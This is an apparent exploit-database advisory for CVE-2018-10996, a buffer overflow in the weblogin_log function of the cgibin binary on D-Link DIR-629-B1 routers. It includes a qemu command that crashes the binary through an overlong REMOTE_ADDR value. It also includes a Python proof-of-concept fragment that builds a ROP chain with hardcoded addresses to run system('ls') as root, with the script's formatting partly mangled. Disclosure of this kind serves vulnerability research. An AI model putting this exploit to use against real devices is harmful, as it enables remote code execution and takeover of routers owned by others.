Authors:kgsdy Risk：High CVE：CVE-2018-10996 0day:Code execution 0day -id:0DAY-176173 Date：2018-05-13
The weblogin_log function in /htdocs/cgibin on D-Link DIR-629-B1 devices allows attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a session.cgi?ACTION=logout request involving a long REMOTE_ADDR environment variable.
The vulnerability was found in the “/htdocs/cgibin” binary.The buffer overflow vulnerability was found in the “weblogin_log” function.
User can pass a long buffer as an ‘session.cgi’ parameter to the ‘/htdocs/cgibin’ binary using ‘REMOTE_ADDR’ function and cause the memory corruption. Furthermore, it is possible to redirect the flow of the program and execute an arbitrary code,write at any address.
Program Segmentation fault：
chroot . ./qemu -0 "session.cgi" -E REQUEST_METHOD="POST" -E SERVER_PORT="80" -E REQUEST_URI="session.cgi?ACTION=logout" -E HTTP_REFERER="ACTION=123" -E CONTENT_LENGTH=$LEN -E CONTENT_TYPE="application/x-www-form-urlencoded" -E HTTP_COOKIE="uid=aaaaa" -E REMOTE_ADDR="::ffff:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab" ./htdocs/cgibin
We have a full control over the return address along with a few other registers. Full ROP chain used to execute ‘system(“ls”);’ as root user can be crafted as follows: (ASLR has been disabled for testing purposes.)
#!/usr/bin/envpython import sys import struct libc =0x76736000 ra=struct.pack(">I",0x7677745C)#godget1 godget2 = struct.pack(">I",0x76777450)#godget2 bufaddr = struct.pack(">I",0x76FFF7A0) systemaddr = struct.pack(">I",0x767872D0)#system REMOTE_ADDR="::ffff:"+"A"*49+ra+"B"*4+bufaddr+"C"*30+godget2+"ls"